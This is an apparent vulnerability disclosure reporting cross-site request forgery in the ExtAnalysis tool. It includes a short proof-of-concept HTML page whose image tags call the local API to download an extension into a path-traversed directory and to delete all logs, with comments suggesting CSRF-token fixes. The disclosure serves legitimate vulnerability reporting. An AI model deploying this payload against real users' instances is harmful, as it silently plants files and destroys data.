Cross-Site Request Forgery (CSRF) in tuhinshubhra/extanalysis
Valid
Reported on
Apr 3rd 2020
Overview
The ExtAnalysis
project is vulnerable against various CSRFs, that could lead to loss of functionalities and placement of malicious files in arbitrary directories without knowledge of the victim.
Proof of Concept (Credit: Mik317)
- Download the git project and run the server through the
python2 extanalysis.py
command - Insert on a malicious host the following code
<html>
<!-- Downloads the Gmass extension in the `Desktop` folder. Fix: avoid `../` CSRF token -->
<img
src="http://127.0.0.1:13337/api/?query=dlanalysis&extid=ehomdgjhgmbidokdgicgmdiedadncbgf&savedir=../../../Desktop/hacked"
/>
<!-- Deletes all the log without knowledge of the victim. Fix: add CSRF token -->
<img src="http://127.0.0.1:13337/api/?query=deleteAll" />
</html>
to join this conversation